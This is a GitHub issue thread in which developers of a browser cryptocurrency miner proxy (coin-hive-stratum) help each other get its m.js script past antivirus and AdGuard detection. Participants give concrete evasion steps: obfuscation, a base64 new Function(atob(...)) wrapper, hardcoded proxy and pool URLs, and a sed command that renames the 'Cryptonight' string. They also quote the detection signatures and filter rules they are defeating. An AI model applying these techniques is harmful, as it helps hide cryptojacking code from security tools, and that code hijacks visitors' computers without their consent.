coin-hive-stratum
Decrypted m.js
Hey guys, can you release a decrypted version of m.js? I want to recompile it. At the moment many antiviruses detect it as a virus.
https://gist.github.com/cazala/50ab1e141736c8a327b26b923a1448e6
Thanks, can you tell us a good utility for obfuscating JS? Everything I have found so far does not help against some antiviruses :-(

- Ikarus: PUA.CoinMiner
- Kaspersky: HEUR:Trojan.Script.Generic
- Symantec: PUA.JScoinminer (20171213)
- ZoneAlarm by Check Point: HEUR:Trojan.Script.Generic
Mm, I didn't do much. I just used https://javascriptobfuscator.com/ and then converted the whole code to base64, and put it into a `new Function(atob("base64source"));`
Maybe the source could also be minified before/after obfuscating it.
Thanks, I will experiment. If this works out, then I will write here.
To get it undetected by Kaspersky I only hardcoded the proxy and removed the `console.log()` calls in m.js, then obfuscated it using the same website mentioned above. Then I base64 encoded it as mentioned above. I would minify it before obfuscating as well.
So @adamdupuis, you don't have to load the .js file using the `?proxy=` query param, right? I believe that's the rule they are using to block it, because I think it gets blocked even before the file is loaded at all, so it has to do with the URL.
In the version where I deobfuscated your m.js I still need to call it with `m.js?proxy=`, but I do not add a value to the parameter. Since modifying CoinHive's code I removed the need for the proxy parameter.
Mm okay, then maybe my theory is wrong. But I don't see why you need to pass the `?proxy=` query param? Is it because of the `throw new Error("missing '?proxy' query parameter in your proxy url!");`?
Yes, I was working with your obfuscated m.js and it was too much work to figure out how to remove the need for it completely so I just left it in. Once I ensure my new version is undetected I will use it without needing the proxy parameter.
Okay, let me know if you make any progress :)
adamdupuis's solution works, thank you!

So, I hardcoded proxyUrl and libUrl like this:

```js
var libUrl = 'http://myserver.com/proxyurl/';
const proxyUrl = 'wss://myserver.com:8892?pool=pool.supportxmr.com:3333';
```

and removed the `throw new Error` and `console.log` calls. Then I minified this with https://www.minifier.org, then obfuscated it with https://javascriptobfuscator.com, encoded the result to base64, and put it into `new Function(atob("base64source"))();`
Nice, I'll update the assets soon.
Damn, AdGuard made a new filter that detects the miner: https://github.com/AdguardTeam/AdguardFilters/blob/8611f98972689e4001b8cb7861e1cab626755b60/EnglishFilter/sections/general_extensions.txt

That filter is based on this JS code:

```js
if (a instanceof Array && "string" === typeof a[0] && 0 <= a[0].indexOf("Cryptonight")) {
```

As I understand it, this code is just looking for the word "Cryptonight" in the JS files of the site. I tried to rename all "Cryptonight", but after this I got errors like:

```
failed to asynchronously prepare wasm: TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply') TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply')
```

Any ideas?
I'll look into it during the weekend, but yeah, I noticed the traffic going through the proxy decreased in the last days to 5% of what it has been the last weeks; it's probably these guys getting smarter.
Man, glad the community here is super active. Looks like @cron13 beat me to it. I'll go delete my issue on that same AdGuard filter. Here's what AdGuard is using in its English filter: https://filters.adtidy.org/extension/chromium/filters/2.txt
If you base64 encode the JavaScript, AdGuard should not be able to detect if "Cryptonight" is in there - or can it?
Already tried. No dice. Will wait till @cron13 figures out a way. @cazala won't be back till the weekend.
Tested this and it stops AdGuard from detecting it.

```sh
sed -i 's:Cryptonight:CN:g' m.js
```

Obviously you need to run this on the decoded m.js, then re-obfuscate and encode it.
I'll make these changes to the assets soon, thanks everyone for helping out :)
Is this just a search and replace?
Yep, working for me and AdGuard doesn't detect it.
https://gist.github.com/amittell/44f868ec729430a9981babe931cef490
@amittell, should you do the same for 'a.js'? It also contains "Cryptonight".
@Akuka I didn't, AdGuard doesn't seem to detect it as it is.
The `a.js` file (asm.js) is not used if WebAssembly is supported. You can force the miner to use asm.js and test if it gets detected by AdGuard by doing this:

```js
var miner = CH.Anonymous('site-key', { forceASMJS: true });
miner.start();
```
Avast Web Shield also detects "Cryptonight".

With what do we need to replace "Cryptonight"?
Anything that's not "Cryptonight" ;)
In my `sed` above I just replaced it with "CN".
Tried, but it didn't work (the miner doesn't start).
Yeah, the miner won't start for me either when I did a find and replace of "cryptonight" to "CRY" - I chose something other than "CN" because I wanted to be able to find it later, and "cn" is commonly found throughout the script.